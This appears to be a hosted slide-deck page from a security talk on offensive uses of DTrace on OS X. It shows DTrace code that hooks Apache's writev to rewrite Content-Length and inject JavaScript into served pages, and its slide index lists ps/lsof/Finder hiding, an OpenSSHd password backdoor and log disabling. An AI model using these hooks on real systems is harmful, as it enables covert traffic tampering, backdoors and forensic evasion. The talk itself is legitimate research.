dtrace-infiltrate

Recommendations

Info

Apache Javascript Injector syscall::writev:entry /execname == "httpd" && self->httpmmaplen/ { self->PAYLOAD = "alert(\"This could be any payload\"); \x0a\x0d\x0a\x0d\x00"; self->newlen = (long *)alloca(sizeof(long)); self->iovp = arg1; /* read the pointer to the headers buffer into self->iov */ self->iov = (unsigned long *)copyin((user_addr_t)((char *)self- >iovp),sizeof(unsigned long)); /* read the length from the iov struct into self->len */ self->len = *(unsigned long *)copyin(self->iovp + sizeof(char *),sizeof(char *)); printf("length: %u\n",self->len);
Apache Javascript Injector /* copy in whole req */ this->req = copyinstr(*self->iov,self->len); this->index = index(this->req, "Content-Length"); /* get rid of content-length header lulz */ this->clhead = strjoin("Content-Length: ", lltostr(self->httpmmaplen + strlen(self- >PAYLOAD))); copyout(this->clhead,*self->iov + this->index,strlen(this->clhead)); } /* Add the length of the payload to the length in the struct. */ *self->newlen = self->len + strlen(self->PAYLOAD); copyout(self->newlen,arg1 + sizeof(char *),sizeof(char *)); /* Save off the part after the headers, so we can restore it at the end */ self->blob = copyin(*self->iov + self->len,strlen(self->PAYLOAD) + 1); /* Write the payload in where we backed up the data. */ copyout(self->PAYLOAD,*self->iov + self->len,strlen(self->PAYLOAD) + 1);
Page 1 and 2:
Destructive D-Trace With Great Powe
Page 3 and 4:
What is Dtrace? Dynamic Instrument
Page 5 and 6:
What is Dtrace? Dtrace executable
Page 7 and 8:
Data Types C style types. (int/lon
Page 9 and 10:
copyin()/copyinstr() Dtrace code i
Page 11 and 12:
Chill void chill(int nanoseconds)
Page 13 and 14:
Pros Anti-forensics properties: Pa
Page 15 and 16:
copyout/copyoutstr Write a block o
Page 17 and 18:
Limitations on Constructs Cannot m
Page 19 and 20: Example: spassrm.d pid$target::strn
Page 21 and 22: Local Backdoor
Page 23 and 24: `ls` Uses getdirentries64() syscal
Page 25 and 26: Dirent Modification - DIRENT 1 Befo
Page 27 and 28: Hooking `ls` - Return syscall::getd
Page 29 and 30: Hooking Finder Apple implemented a
Page 31 and 32: Hooking Finder - Method Read in wh
Page 33 and 34: Finder Demo
Page 35 and 36: Hiding from `lsof` for (ef = 0; !ef
Page 37 and 38: Hiding from `lsof` - 2 nd Entrypoin
Page 39 and 40: Hiding from `lsof` syscall::proc_in
Page 41 and 42: Hiding Processes Processes need hi
Page 43 and 44: Hiding from `ps` ps on OSX uses sy
Page 45 and 46: Hiding from `ps` - tasks.c int get_
Page 47 and 48: Hiding from `ps`
Page 49 and 50: libtop libtop_p_task_update(task_t
Page 51 and 52: libtop mach_trap::pid_for_task:retu
Page 53 and 54: activitymonitord Turns out libtop
Page 55 and 56: OpenSSHd Backdoor Almost no system
Page 57 and 58: dshdbd.d - (Client) Modify the nex
Page 59 and 60: OpenSSHd Backdoor - read passwd hoo
Page 61 and 62: OpenSSHd Backdoor Next the fstat64
Page 63 and 64: SSHd Backdoor - Output -[dcbz@squee
Page 65 and 66: utmpx Disable Next, a write() hook
Page 67 and 68: Apache Javascript Injector Hook op
Page 69: Writev() syscall writev(int fildes,
Page 73 and 74: Designing OSX Rootkits nemo/fracta
show all

dtrace-infiltrate

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?